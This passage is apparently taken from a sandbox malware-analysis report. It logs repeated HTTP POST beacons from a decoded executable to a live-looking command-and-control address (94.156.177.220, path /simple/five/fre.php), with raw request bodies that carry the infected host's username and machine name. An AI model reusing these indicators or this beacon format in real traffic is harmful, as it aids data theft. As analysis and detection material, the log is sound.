Oct 25, 2024 10:20:25.959554911 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:25.965151072 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:26.942964077 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49756	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:27.712598085 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:27.717962980 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:28.695118904 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49757	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:29.857386112 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:29.863609076 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:30.839289904 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49758	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:30.991204977 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:30.997406006 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:32.009637117 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49759	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:32.170057058 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:32.176321983 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:33.137624025 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49760	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:33.682240009 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:33.687798977 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:34.643838882 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:34 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49761	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:34.804533958 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:34.810261011 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:35.764405012 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49762	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:35.911026955 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:35.916781902 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:36.884356022 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49763	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:37.040622950 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:37.046303034 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:38.036004066 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49764	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:38.195120096 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:38.200499058 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:39.179270029 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:39 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49765	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:39.816567898 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:39.822242975 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:40.795761108 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:40 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49766	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:40.945086002 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:40.950582981 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:42.075862885 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49767	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:42.429171085 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:42.434571028 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:43.413599014 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49768	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:43.570328951 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:43.576011896 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:44.566714048 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49769	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:44.747003078 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:44.753726006 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:45.718827009 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49770	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:45.962044954 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:45.967782974 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:46.934838057 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49771	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:47.084693909 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:47.090625048 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:48.041701078 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:47 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49772	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:48.360626936 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:48.628753901 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:49.291296959 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49773	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:49.445259094 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:49.450869083 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:50.444104910 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49774	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:50.627054930 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:50.632515907 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
